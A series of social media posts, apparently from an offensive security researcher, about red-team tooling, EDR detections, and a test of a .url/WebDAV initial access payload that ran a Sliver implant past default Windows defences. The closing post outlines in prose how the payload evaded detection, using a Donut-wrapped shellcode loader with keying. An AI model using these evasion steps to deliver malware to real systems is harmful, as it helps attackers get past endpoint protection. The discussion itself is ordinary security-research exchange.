RT @malmoeb: New blog post: Tear Down The Castle - Part 1 I analyzed 250 PingCastle Reports, grouping the findings…

EDRs in 2025 are going crazy. This helloworld was flagged by machine learning detections as dangerous high confidence malware right now. Ok, I understand they are afraid of non-console C code apps cross-compiled using MinGW, but what models are they using anyway? :)

RT @_dirkjan: Few BloodHound python updates: LDAP channel binding is now supported with Kerberos auth (native) or with NTLM (custom ldap3 v…

RT @Synacktiv: You can now use LDAP/LDAPs protocols with the SOCKS proxy of ntlmrelayx thanks to the PR from @b1two_ (now merged upstream).…

@Theonly_Hoff of course. and just came across this now: 1st feature added is stopping go-donut to bypass amsi by default ;)

ok, tbh, if you want to do some nasty post-ex stuff like using the priv/kiwi module or etc, don't expect it to be flying under the radar unless using advanced evasion techniques.

this is why I made minor addons to the awesome steganography poc tool by @zcollinsdev:

@Avasea11 yep, it is huge. ~15 MB.

RT @michael_eder_: NFS has not received much attention of the offensive security community in nearly a decade. Today, we are happy to share…

if interested in current initial access techniques (like this .url one), I would highly recommend the slides from "Breach the Gates" presentation given by @EmericNasi on @TheOffensiveX con this year: the slides are here:

and one more note: please don't overhype this. ;) 1.) the .url initial payload w/ webdav is not a new technique. 2.) this was tested here against only basic Defender. 3.) running Sliver is nice, but it is not a total victory. even if it is running, post-ex tasks could be caught.

answering to some questions: here are the two popups. of course these lower the success rate of an attacker, but not too much. these popups can be passed with trivial clicks (open+run), it is not hidden, no need to do some multi-step activity like smartscreen's "more info".

@ShitSecure yes, we had MotW, propagated over the zip extraction, but in the end it allowed me to execute the malicious .url file (only a basic warning popup was raised). and I think smartscreen was enabled (left everything on defaults, tested on a win10+win11 install also).

fix try #2 (success!) in a nutshell: - apply Donut on the EXE payload manually w/o AMSI bypass to get a shellcode loading the PE. - pack the encoded shellcode inside a basic custom loader as an embedded resource (no need to use staging). - no adv evasions, only some keying.